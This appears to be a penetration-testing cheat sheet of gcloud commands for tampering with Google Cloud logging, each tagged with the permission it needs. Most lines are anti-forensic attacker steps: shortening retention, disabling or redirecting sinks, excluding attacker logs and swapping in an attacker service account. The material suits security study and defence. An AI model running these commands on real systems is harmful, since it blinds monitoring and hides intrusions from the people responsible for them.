# Read logs
gcloud logging read "logName=projects/your-project-id/logs/log-id" --limit=10 --format=json

# Everything from a timestamp
gcloud logging read "timestamp >= \"2023-01-01T00:00:00Z\"" --limit=10 --format=json

# Use these options to indicate a different bucket or view to use: --bucket=_Required --view=_Default
# Permission required: logging.buckets.update

# Set retention period to 1 day (_Required has a fixed one of 400 days)
gcloud logging buckets update bucketlog --location=<location> --description="New description" --retention-days=1
# Disable sink - logging.sinks.update
gcloud logging sinks update <sink-name> --disabled

# Create a filter to exclude attackers logs - logging.sinks.update
gcloud logging sinks update SINK_NAME --add-exclusion="name=exclude-info-logs,filter=severity<INFO"

# Change where the sink is storing the data - logging.sinks.update
gcloud logging sinks update <sink-name> new-destination

# Change the service account to one without permissions to write in the destination - logging.sinks.update
gcloud logging sinks update SINK_NAME --custom-writer-identity=attacker-service-account-email --project=PROJECT_ID

# Remove exclusions to try to overload with logs - logging.sinks.update
gcloud logging sinks update SINK_NAME --clear-exclusions

# If the sink exports to BigQuery, an attacker might enable or disable the use of
# partitioned tables, potentially leading to inefficient querying and higher costs. - logging.sinks.update
gcloud logging sinks update SINK_NAME --use-partitioned-tables
gcloud logging sinks update SINK_NAME --no-use-partitioned-tables